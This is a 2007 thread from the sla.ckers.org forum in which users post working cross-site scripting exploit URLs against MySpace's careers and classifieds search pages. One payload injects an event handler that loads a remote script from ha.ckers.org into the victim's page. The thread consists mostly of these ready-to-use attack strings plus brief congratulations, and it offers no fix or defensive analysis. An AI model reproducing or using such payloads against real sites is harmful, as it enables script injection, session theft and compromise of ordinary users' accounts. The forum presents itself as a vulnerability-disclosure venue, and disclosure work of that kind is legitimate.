Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Myspace exploit ^7
Posted by: Lockdown
Date: January 14, 2007 11:18PM

Thanks to Malorn for the starting place

http://sads.myspace.com/index.cfm?fuseaction=careers.search&keywords=lawl+%27&location=%22+onmouseover%3D%22alert%28%27xss%27%29%3B&special=&sb=&startIndex=0

We win. Again.

http://sads.myspace.com/index.cfm?fuseaction=careers.search&keywords=lawl&location=%22+onmouseover%3D%22alert%28%27Lockdown%20LOL%27%29%3Bvar+scElem+%3D+%27scri%27%2B%27pt%27%3Bx%3Ddocument.createElement%28scElem%29%3Bx.src%3D%27http%3A%2F%2Fha.ckers.org%2Fs.js%27%3Bdocument.body.appendChild%28x%29%3B%22&special=&sb=rel&startIndex=0

I'd like to give props to Whiteacid, digi7al64, and r0xes for being my hero.



Edited 1 time(s). Last edit at 01/14/2007 11:40PM by Lockdown.

Options: ReplyQuote
Re: Myspace exploit ^7
Posted by: eyeced
Date: January 15, 2007 10:52AM

This isnt ^7. The posts were started (by me, actually) for non-alpha non-digit exploits in myspace, not url exploits. Maluc has posted exploits in the urls, in So it begins. Personally i don't think this falls into the ^7 category. Nice exploit never the less.

Options: ReplyQuote
Re: Myspace exploit ^7
Posted by: trev
Date: January 18, 2007 10:33PM

http://classifieds.myspace.com/index.cfm?fuseaction=classifieds.searchCategory&keyword=%22%3E%3Cbody+onmouseover%3Cscript%3D%22alert%28%27XSS%27%29 looks more like it.

Options: ReplyQuote
Re: Myspace exploit ^7
Posted by: rsnake
Date: January 22, 2007 12:25PM

Nice, find, Trev!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.